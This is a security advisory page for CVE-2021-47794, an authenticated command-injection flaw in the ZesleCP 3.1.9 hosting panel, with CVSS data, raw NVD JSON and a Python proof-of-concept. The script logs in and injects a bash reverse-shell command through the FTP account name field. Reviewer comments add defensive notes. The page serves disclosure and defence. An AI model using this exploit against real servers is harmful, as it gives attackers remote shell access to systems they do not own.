Security Vulnerability Report
CVE-2021-47794 CVSS 8.8 HIGH

CVE-2021-47794

Published: 2026-01-16 00:16:23
Last Modified: 2026-01-21 21:56:16

Description

ZesleCP 3.1.9 contains an authenticated remote code execution vulnerability that allows attackers to create malicious FTP accounts with shell injection payloads. Attackers can exploit the FTP account creation endpoint by injecting a reverse shell command that establishes a network connection to a specified listening host.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:zesle:zeslecp:*:*:*:*:*:*:*:* - VULNERABLE
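ZesleCP, versions up to and including 3.1.9 (the CPE match data in the raw JSON below sets versionEndIncluding to 3.1.9)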

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2021-47794 PoC - ZesleCP Authenticated RCE via FTP Account Creation

Author: Security Researcher
Reference: https://www.exploit-db.com/exploits/50233

Reviewer notes
--------------
* The advisory record on this page classifies the weakness as CWE-78 (OS
  command injection). The script places shell syntax in the FTP account
  *username* form field, which implies that field reaches a shell command on
  the server without neutralisation -- confirm against the referenced advisory.
* The request paths and form field names used below are taken as given by this
  listing and are not verified here against the product or the reference.
* Every "success" message below is driven solely by an HTTP 200 status code;
  neither authentication nor command execution is actually confirmed.
* For defenders: the injected value contains ';', '&' and '>' characters, so
  account-name validation against a strict allow-list (and passing the name to
  the OS as an argument vector rather than through a shell) addresses the root
  cause; account-creation requests whose name contains shell metacharacters,
  and unexpected outbound connections from the panel host, are the observable
  traces this script would leave.
"""
import requests
import sys
from urllib.parse import quote  # imported by the original listing; unused below


def exploit_zeslecp(target_url, username, password, attacker_ip, attacker_port):
    """
    Log in to ZesleCP and submit an FTP account whose name carries shell syntax.

    Args:
        target_url: Base URL of ZesleCP installation
        username: Valid ZesleCP username
        password: Password for the account
        attacker_ip: Listening IP embedded in the injected command
        attacker_port: Listening port embedded in the injected command

    Returns:
        True when the account-creation request returns HTTP 200, otherwise
        False (login returned non-200, creation returned non-200, or the
        creation request raised a requests exception).
    """
    http = requests.Session()

    # Step 1: authenticate; the session object carries any cookies forward.
    print(f"[*] Logging in to ZesleCP at {target_url}")
    # NOTE(review): this call is outside the try block, so a connection error
    # here propagates to the caller instead of returning False.
    login_reply = http.post(
        f"{target_url}/login",
        data={'username': username, 'password': password},
        timeout=30,
    )
    if login_reply.status_code != 200:
        print("[-] Login failed - check credentials")
        return False
    # NOTE(review): a 200 response is treated as a successful login; a login
    # form that re-renders with an error would also pass this check.
    print("[+] Login successful")

    # Step 2: build the account-creation form. The account name is the
    # injection point: text after the first ';' is shell syntax, not a name.
    injected_name = f"test;bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1;"
    account_form = {
        'username': injected_name,
        'password': 'Password123!',
        'homedir': '/home'
    }

    print(f"[*] Creating FTP account with malicious payload...")
    print(f"[*] Payload: {injected_name}")

    try:
        create_reply = http.post(
            f"{target_url}/ftp-account/create",
            data=account_form,
            timeout=30,
        )
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

    if create_reply.status_code != 200:
        print(f"[-] Exploit failed with status code: {create_reply.status_code}")
        return False

    # HTTP 200 only means the request was accepted by the web layer.
    print("[+] Exploit sent - check your listener for reverse shell")
    print(f"[*] Listening on {attacker_ip}:{attacker_port}")
    return True


if __name__ == "__main__":
    # Five positional arguments are required; extra arguments are ignored.
    if len(sys.argv) < 6:
        print("Usage: python3 cve-2021-47794.py <target_url> <username> <password> <attacker_ip> <attacker_port>")
        print("Example: python3 cve-2021-47794.py https://zeslecp.local admin password123 192.168.1.100 4444")
        sys.exit(1)

    target, user, passwd, lhost, lport = sys.argv[1:6]
    exploit_zeslecp(target, user, passwd, lhost, lport)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47794", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:23.387", "lastModified": "2026-01-21T21:56:15.567", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ZesleCP 3.1.9 contains an authenticated remote code execution vulnerability that allows attackers to create malicious FTP accounts with shell injection payloads. Attackers can exploit the FTP account creation endpoint by injecting a reverse shell command that establishes a network connection to a specified listening host."}, {"lang": "es", "value": "ZesleCP 3.1.9 contiene una vulnerabilidad de ejecución remota de código autenticada que permite a los atacantes crear cuentas FTP maliciosas con cargas útiles de inyección de shell. Los atacantes pueden explotar el endpoint de creación de cuentas FTP inyectando un comando de shell inverso que establece una conexión de red a un host de escucha especificado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:zesle:zeslecp:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.1.9", "matchCriteriaId": "3CB14E4D-D929-4020-A42D-F66F894AD774"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50233", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/zeslecp-remote-code-execution-rce-authenticated", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.youtube.com/watch?v=5lTDTEBVq-0", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://zeslecp.com/", "source": "[email protected]", "tags": ["Product"]}]}}